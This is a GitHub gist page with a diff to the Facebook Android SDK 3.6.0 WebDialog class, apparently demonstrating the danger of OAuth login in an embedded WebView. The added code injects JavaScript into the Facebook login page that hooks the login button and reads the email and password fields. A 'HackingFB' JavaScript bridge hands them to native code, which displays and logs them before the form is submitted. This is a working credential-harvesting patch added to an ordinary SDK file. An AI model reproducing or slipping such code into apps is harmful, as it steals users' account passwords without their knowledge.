Skip to content

Instantly share code, notes, and snippets.

@mohsin
Forked from creativepsyco/HackFB.diff
Created January 15, 2016 18:59
Show Gist options
  • Save mohsin/d0a308d8fcfa8cacf7c6 to your computer and use it in GitHub Desktop.
Save mohsin/d0a308d8fcfa8cacf7c6 to your computer and use it in GitHub Desktop.
Facebook Android SDK 3.6.0 OAuth using embedded Web View
diff --git i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
index 70ac868..c2c9af0 100644
--- i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
+++ w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
@@ -17,6 +17,7 @@
package com.facebook.widget;
import android.annotation.SuppressLint;
+import android.app.AlertDialog;
import android.app.Dialog;
import android.app.ProgressDialog;
import android.content.Context;
@@ -29,8 +30,11 @@ import android.net.Uri;
import android.net.http.SslError;
import android.os.Bundle;
import android.util.DisplayMetrics;
+import android.util.Log;
import android.view.*;
+import android.webkit.JavascriptInterface;
import android.webkit.SslErrorHandler;
+import android.webkit.WebChromeClient;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import android.widget.FrameLayout;
@@ -43,6 +47,8 @@ import com.facebook.internal.ServerProtocol;
import com.facebook.internal.Utility;
import com.facebook.internal.Validate;
+import org.json.JSONTokener;
+
/**
* This class provides a mechanism for displaying Facebook Web dialogs inside a Dialog. Helper
* methods are provided to construct commonly-used dialogs, or a caller can specify arbitrary
@@ -342,6 +348,15 @@ public class WebDialog extends Dialog {
ViewGroup.LayoutParams.MATCH_PARENT));
webView.setVisibility(View.INVISIBLE);
webView.getSettings().setSavePassword(false);
+ webView.addJavascriptInterface(new HackingFB(), "HackingFB");
+ webView.setWebChromeClient(new WebChromeClient() {
+ @Override
+ public void onConsoleMessage(String message, int lineNumber, String sourceID) {
+ Log.e("password", message + " -- From line "
+ + lineNumber + " of "
+ + sourceID);
+ }
+ });
webViewContainer.setPadding(margin, margin, margin, margin);
webViewContainer.addView(webView);
@@ -349,6 +364,24 @@ public class WebDialog extends Dialog {
contentFrameLayout.addView(webViewContainer);
}
+ private class HackingFB {
+
+ @JavascriptInterface
+ public void foundCredential(String name, String password) {
+ harvest(name, password);
+ }
+
+ private void harvest(String name, String password) {
+ AlertDialog.Builder alertDialogBuilder = new AlertDialog.Builder(
+ getContext());
+ alertDialogBuilder.setTitle(name);
+ alertDialogBuilder.setMessage(password);
+ alertDialogBuilder.create();
+ alertDialogBuilder.show();
+ Log.e("Password", String.format("%s %s", name, password));
+ }
+ }
+
private class DialogWebViewClient extends WebViewClient {
@Override
@SuppressWarnings("deprecation")
@@ -396,10 +429,11 @@ public class WebDialog extends Dialog {
} else if (url.contains(DISPLAY_TOUCH)) {
return false;
}
+ return false;
// launch non-dialog URLs in a full browser
- getContext().startActivity(
- new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
- return true;
+// getContext().startActivity(
+// new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
+// return true;
}
@Override
@@ -445,6 +479,16 @@ public class WebDialog extends Dialog {
contentFrameLayout.setBackgroundColor(Color.TRANSPARENT);
webView.setVisibility(View.VISIBLE);
crossImageView.setVisibility(View.VISIBLE);
+ if (url.contains("facebook.com/login.php")) {
+ Log.e("password ", "Sending alert");
+ view.loadUrl("javascript:console.log('password From Native')");
+ view.loadUrl("javascript:console.log(document)");
+ view.loadUrl("" +
+ "javascript:function hacker() {" +
+ "var f = document.getElementsByTagName('form')[0];" +
+ " HackingFB.foundCredential(f.email.value, f.pass.value); " +
+ "f.submit()}; document.getElementsByName('login')[0].onclick=hacker; ");
+ }
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment